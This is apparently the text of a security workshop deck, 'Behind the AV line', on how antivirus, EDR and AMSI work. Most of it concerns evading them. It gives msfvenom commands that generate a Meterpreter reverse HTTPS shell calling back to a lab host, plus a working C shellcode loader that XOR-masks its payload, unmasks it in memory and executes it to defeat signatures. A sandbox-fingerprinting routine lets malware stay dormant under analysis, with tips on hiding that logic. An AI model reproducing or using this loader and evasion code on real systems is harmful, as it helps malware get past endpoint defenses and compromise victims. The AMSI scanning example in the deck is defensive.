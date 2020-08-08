
1. BEHIND THE AV LINE: HOW THE ANTIVIRUSES WORK https://twitter.com/dawid_golak
2. BEHIND THE AV LINE ANTIVIRUSES https://www.av-comparatives.org/list-of-enterprise-av-vendors-pc/
3. BEHIND THE AV LINE BEYOND THE ANTIVIRUS, OR THE WORLD OF EDR ▸ Usually two components. ▸ Kernel mode (one or more drivers): process monitoring ▸ User mode (usually a service): supporting functions such as reinstall/update, and API hooking inside the monitored process
4. AMSI: ANTIMALWARE SCAN INTERFACE
5. BEHIND THE AV LINE AMSI ▸ The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. ▸ AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads. https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
6. BEHIND THE AV LINE WINDOWS COMPONENTS THAT INTEGRATE WITH AMSI ▸ User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation) ▸ PowerShell (scripts, interactive use, and dynamic code evaluation) ▸ Windows Script Host (wscript.exe and cscript.exe) ▸ JavaScript and VBScript ▸ Office VBA macros
7. BEHIND THE AV LINE AMSI https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
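What "integrating with AMSI" looks like from a host application's side, as an added example that is not from the talk: the host initialises one context, opens a session per script, and hands each buffer to AmsiScanBuffer before executing it; whichever antimalware provider is registered (Defender by default) returns an AMSI_RESULT. The EICAR test string is the sample content, the application name "ExampleHost" and the content name "eicar.ps1" are arbitrary, and outside Windows only the result-interpretation helpers compile.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* AMSI_RESULT values from amsi.h. Anything >= 32768 is malware, which is the
 * rule the AmsiResultIsMalware() macro applies; 16384..20479 is an admin block. */
#define AMSI_CLEAN                  0
#define AMSI_NOT_DETECTED           1
#define AMSI_BLOCKED_BY_ADMIN_START 16384
#define AMSI_BLOCKED_BY_ADMIN_END   20479
#define AMSI_DETECTED               32768

int amsi_result_is_malware(unsigned r) { return r >= AMSI_DETECTED; }

int amsi_result_is_admin_block(unsigned r)
{
    return r >= AMSI_BLOCKED_BY_ADMIN_START && r <= AMSI_BLOCKED_BY_ADMIN_END;
}

/* What a host should do with the verdict: only CLEAN may be cached, and
 * anything at or above DETECTED must not run. */
const char *amsi_verdict(unsigned r)
{
    if (amsi_result_is_malware(r))     return "detected: do not run";
    if (amsi_result_is_admin_block(r)) return "blocked by administrator policy";
    if (r == AMSI_CLEAN)               return "clean: result may be cached";
    return "not detected: run, but do not cache";
}

/* Standard EICAR test string: harmless, but every engine is expected to flag it. */
const char EICAR[] = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";

#ifdef _WIN32
#include <windows.h>
#include <amsi.h>
#pragma comment(lib, "amsi.lib")   /* MSVC; with MinGW link -lamsi instead */

/* One context per application, one session per logical unit (a script), one
 * AmsiScanBuffer call per chunk, the same sequence PowerShell runs on script
 * text. Returns 0 and sets *result on success, -1 if AMSI could not be used. */
int scan_with_amsi(const void *buf, size_t len, const wchar_t *content_name, unsigned *result)
{
    HAMSICONTEXT ctx = NULL;
    HAMSISESSION session = NULL;
    AMSI_RESULT res = AMSI_RESULT_CLEAN;
    HRESULT hr;
    if (FAILED(AmsiInitialize(L"ExampleHost", &ctx)))   /* app name is arbitrary */
        return -1;
    if (FAILED(AmsiOpenSession(ctx, &session))) {
        AmsiUninitialize(ctx);
        return -1;
    }
    hr = AmsiScanBuffer(ctx, (PVOID)buf, (ULONG)len, content_name, session, &res);
    AmsiCloseSession(ctx, session);
    AmsiUninitialize(ctx);
    if (FAILED(hr))
        return -1;
    *result = (unsigned)res;
    return 0;
}
#endif

int main(void)
{
#ifdef _WIN32
    unsigned r = 0;
    if (scan_with_amsi(EICAR, sizeof EICAR - 1, L"eicar.ps1", &r) == 0)
        printf("AMSI result %u -> %s\n", r, amsi_verdict(r));
    else
        printf("AMSI scan failed: no provider registered, or AMSI unavailable\n");
#else
    printf("AMSI is Windows-only; verdict mapping: %u -> %s, %u -> %s\n",
           (unsigned)AMSI_DETECTED, amsi_verdict(AMSI_DETECTED),
           (unsigned)AMSI_NOT_DETECTED, amsi_verdict(AMSI_NOT_DETECTED));
#endif
    return 0;
}
```

The point for the rest of the talk: the scan happens on the decoded buffer in memory, after any obfuscation the script carried has been undone by the interpreter, which is why script-level encoding alone does not get past AMSI the way it can get past an on-disk file scan.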
8. BINARY VS SCRIPTING
9. STATIC, DYNAMIC, NETWORK: CATCH ME IF YOU CAN
10. BEHIND THE AV LINE STATIC ANALYSIS ▸ Any of these file operations hands the file to the on-access scanner: ▸ copy ▸ move ▸ delete ▸ view ▸ touch
11. BEHIND THE AV LINE STATIC ANALYSIS - VIRUSTOTAL.COM
12. BEHIND THE AV LINE DYNAMIC ANALYSIS ▸ Sandbox
13. BEHIND THE AV LINE NETWORK ANALYSIS
15. METASPLOIT: HOW THE TEMPLATES WORK
16. BEHIND THE AV LINE MSF TEMPLATES
▸ msfvenom -p windows/[x86/x64]/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f exe -o calc.exe
▸ /usr/share/metasploit-framework/data/templates/src/pe/exe
    #include <stdio.h>
    #define SCSIZE 4096
    char payload[SCSIZE] = "PAYLOAD:";   /* marker: msfvenom finds "PAYLOAD:" in the prebuilt template and writes the shellcode over it */
    char comment[512] = "";
    int main(int argc, char **argv) {
        (*(void (*)()) payload)();       /* jump straight into the buffer; works only because the template's data section is executable */
        return(0);
    }
17. LET'S WALK THE WALK AND STOP TALKING THE TALK: WORKSHOP
18. PE FILE
19. BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS ▸ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f hex ▸ XOR the shellcode bytes [+hint]
20. BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS ▸ Find out which bytes the engine actually signatures on, e.g. for Windows Defender: https://github.com/matterpreter/DefenderCheck
21. BEHIND THE AV LINE WHERE IS MY DATA ▸ char shellcode[] = "\xfc\x48\x83..."; ▸ Which PE section the bytes land in depends on how the buffer is declared: ▸ .text ▸ .data ▸ .rsrc
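One way to put slides 19 to 21 together, as an added example rather than the speaker's own code: the stager is stored XOR-masked under a multi-byte key in .data, unmasked into memory only just before it is called, and the file can be checked for how many clear bytes a signature could still hit. The 6-byte x86-64 stub used as the payload, the key and the masked bytes are constructed for this example; the hex that msfvenom -f hex prints would replace the stub in a real build.

```c
#ifndef _WIN32
#define _GNU_SOURCE   /* mmap/mprotect/MAP_ANONYMOUS on POSIX */
#endif
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

#define PAYLOAD_LEN 6

/* Constructed stand-in for the stager, NOT real shellcode: a 6-byte x86-64
 * function "mov eax, 0x1337 ; ret", so the unmask-and-call path can be run
 * safely. Kept here only so the example can show before/after; a real build
 * masks offline and ships masked_payload alone. */
const uint8_t clear_payload[PAYLOAD_LEN] = { 0xB8, 0x37, 0x13, 0x00, 0x00, 0xC3 };

/* Multi-byte key, chosen for the example. A single-byte key turns the
 * payload's zero runs into runs of the key byte, which is itself a signature. */
const uint8_t key[] = { 0x5A, 0xC3, 0x9F, 0x21 };

/* What ships in the file. Non-const and initialised, so the compiler puts it
 * in .data; "static const" would go to .rdata/.rodata, and a Windows resource
 * (FindResource/LoadResource) would put it in .rsrc. */
uint8_t masked_payload[PAYLOAD_LEN] = { 0xE2, 0xF4, 0x8C, 0x21, 0x5A, 0x00 };

/* Symmetric multi-byte XOR: the same call masks and unmasks. */
void xor_crypt(uint8_t *buf, size_t n, const uint8_t *k, size_t klen)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= k[i % klen];
}

/* Unmask into a caller buffer right before use, never in place in .data. */
void unmask_payload(uint8_t *out, size_t n)
{
    memcpy(out, masked_payload, n);
    xor_crypt(out, n, key, sizeof key);
}

/* How many bytes a signature written against the clear stager still finds. */
size_t bytes_in_clear(const uint8_t *masked, const uint8_t *clear, size_t n)
{
    size_t same = 0;
    for (size_t i = 0; i < n; i++)
        same += (masked[i] == clear[i]);
    return same;
}

/* Self-check: masking the clear bytes must reproduce masked_payload and
 * unmasking must give them back. Returns 1 when both hold. */
int mask_roundtrip_ok(void)
{
    uint8_t tmp[PAYLOAD_LEN];
    memcpy(tmp, clear_payload, PAYLOAD_LEN);
    xor_crypt(tmp, PAYLOAD_LEN, key, sizeof key);
    if (memcmp(tmp, masked_payload, PAYLOAD_LEN) != 0)
        return 0;
    unmask_payload(tmp, PAYLOAD_LEN);
    return memcmp(tmp, clear_payload, PAYLOAD_LEN) == 0;
}

typedef int (*payload_fn)(void);

/* Map RW, copy the unmasked bytes in, flip to RX, then call. Asking for one
 * RWX region instead is among the cheapest heuristics to trip. */
int run_payload(const uint8_t *code, size_t n)
{
    int rc = -1;
    payload_fn fn;
#ifdef _WIN32
    DWORD old;
    void *mem = VirtualAlloc(NULL, n, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) return -1;
    memcpy(mem, code, n);
    memcpy(&fn, &mem, sizeof fn);
    if (VirtualProtect(mem, n, PAGE_EXECUTE_READ, &old)) rc = fn();
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    void *mem = mmap(NULL, n, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;
    memcpy(mem, code, n);
    memcpy(&fn, &mem, sizeof fn);
    if (mprotect(mem, n, PROT_READ | PROT_EXEC) == 0) rc = fn();
    munmap(mem, n);
#endif
    return rc;
}

int main(int argc, char **argv)
{
    uint8_t buf[PAYLOAD_LEN];
    printf("self-check: %s\n", mask_roundtrip_ok() ? "ok" : "FAILED");
    printf("%zu of %d payload bytes appear in clear in the file\n",
           bytes_in_clear(masked_payload, clear_payload, PAYLOAD_LEN), PAYLOAD_LEN);
    unmask_payload(buf, PAYLOAD_LEN);
#if defined(__x86_64__) || defined(_M_X64)
    /* The stub is x86-64 code: only jump into it there, and only on request. */
    if (argc > 1 && strcmp(argv[1], "--run") == 0)
        printf("payload returned 0x%x\n", run_payload(buf, PAYLOAD_LEN));
#else
    (void)argc; (void)argv;
#endif
    return 0;
}
```

Masking defeats a byte-pattern signature on the stager, and nothing more: the loader's own shape (a blob in .data, an RW-then-RX allocation, a call into it) is what the dynamic side of the talk is about, and DefenderCheck is the way to find out which of the two the engine is actually matching on.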
22. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x01
23. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x02
24. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x03
25. BEHIND THE AV LINE BYPASS DYNAMIC ▸ workstation fingerprint
26. WHAT'S NEXT?
27. THX
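A workstation fingerprint of the kind slides 12 and 25 refer to, as an added example and not the speaker's code: collect a few facts a disposable analysis VM tends to get wrong, score them, and only unpack when the host looks like a real workstation. The indicators, the thresholds, the two-indicator policy and the 500 ms sleep probe are this example's assumptions; the sample fingerprints at the bottom are constructed.

```c
#ifndef _WIN32
#define _GNU_SOURCE   /* clock_gettime, nanosleep and the sysconf names */
#endif
#include <stdio.h>
#include <stdint.h>
#include <time.h>
#ifdef _WIN32
#include <windows.h>
#include <lm.h>
#pragma comment(lib, "netapi32.lib")
#else
#include <unistd.h>
#endif

/* Facts about the host a loader can collect cheaply and without much noise. */
struct host_fp {
    unsigned cpus;          /* logical processors */
    uint64_t ram_mb;        /* physical memory */
    uint64_t uptime_s;      /* seconds since boot */
    int      domain_joined; /* 1 if the machine is in an AD domain */
    double   sleep_ratio;   /* measured/requested sleep; well below 1 means Sleep was patched */
};

/* Sleep and time it against a clock the sandbox is less likely to have
 * patched: sandboxes that fast-forward Sleep() to get past delays return
 * early, and the ratio drops. */
double measure_sleep_ratio(unsigned ms)
{
    struct timespec a, b;
#ifdef _WIN32
    timespec_get(&a, TIME_UTC);
    Sleep(ms);
    timespec_get(&b, TIME_UTC);
#else
    struct timespec req = { (time_t)(ms / 1000), (long)(ms % 1000) * 1000000L };
    clock_gettime(CLOCK_MONOTONIC, &a);
    nanosleep(&req, NULL);
    clock_gettime(CLOCK_MONOTONIC, &b);
#endif
    double elapsed_ms = (double)(b.tv_sec - a.tv_sec) * 1000.0 + (double)(b.tv_nsec - a.tv_nsec) / 1e6;
    return elapsed_ms / (double)ms;
}

#ifdef _WIN32
void collect_fingerprint(struct host_fp *f)
{
    SYSTEM_INFO si;
    MEMORYSTATUSEX ms;
    LPWSTR name = NULL;
    NETSETUP_JOIN_STATUS js = NetSetupUnknownStatus;
    GetSystemInfo(&si);
    ms.dwLength = sizeof ms;
    GlobalMemoryStatusEx(&ms);
    f->cpus = si.dwNumberOfProcessors;
    f->ram_mb = ms.ullTotalPhys / (1024 * 1024);
    f->uptime_s = GetTickCount64() / 1000;
    f->domain_joined = NetGetJoinInformation(NULL, &name, &js) == NERR_Success && js == NetSetupDomainName;
    if (name) NetApiBufferFree(name);
    f->sleep_ratio = measure_sleep_ratio(500);
}
#else
void collect_fingerprint(struct host_fp *f)
{
    struct timespec now;
    f->cpus = (unsigned)sysconf(_SC_NPROCESSORS_ONLN);
    f->ram_mb = (uint64_t)sysconf(_SC_PHYS_PAGES) * (uint64_t)sysconf(_SC_PAGESIZE) / (1024 * 1024);
    clock_gettime(CLOCK_MONOTONIC, &now);  /* close enough to time since boot */
    f->uptime_s = (uint64_t)now.tv_sec;
    f->domain_joined = 0;                  /* no directory lookup on this platform */
    f->sleep_ratio = measure_sleep_ratio(500);
}
#endif

/* Count the indicators pointing at a disposable analysis VM. Thresholds are
 * this example's assumptions, aimed at a corporate Windows 10 desktop. */
int sandbox_indicators(const struct host_fp *f)
{
    int n = 0;
    n += f->cpus < 2;
    n += f->ram_mb < 4096;
    n += f->uptime_s < 10 * 60;
    n += !f->domain_joined;
    n += f->sleep_ratio < 0.9;
    return n;
}

/* Policy: one odd fact (a home laptop off-domain) is fine, two or more is not. */
int looks_like_sandbox(const struct host_fp *f)
{
    return sandbox_indicators(f) >= 2;
}

/* Constructed fingerprints: a small sandbox VM, a domain desktop, an off-domain laptop. */
const struct host_fp sample_sandbox = { 1, 2048, 120, 0, 0.3 };
const struct host_fp sample_desktop = { 8, 16384, 3 * 24 * 3600, 1, 1.0 };
const struct host_fp sample_laptop  = { 4, 8192, 7200, 0, 1.0 };

int main(void)
{
    struct host_fp me;
    collect_fingerprint(&me);
    printf("cpus=%u ram=%lluMB uptime=%llus domain=%d sleep_ratio=%.2f -> %d indicator(s): %s\n",
           me.cpus, (unsigned long long)me.ram_mb, (unsigned long long)me.uptime_s,
           me.domain_joined, me.sleep_ratio, sandbox_indicators(&me),
           looks_like_sandbox(&me) ? "stay dormant" : "proceed");
    return 0;
}
```

Every one of these checks is also a known-bad pattern to the sandboxes that matter, so the decision function is the part to keep quiet about: a loader that exits immediately on a single indicator is itself a strong signal, while one that simply behaves like a benign program on a suspicious host is not.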
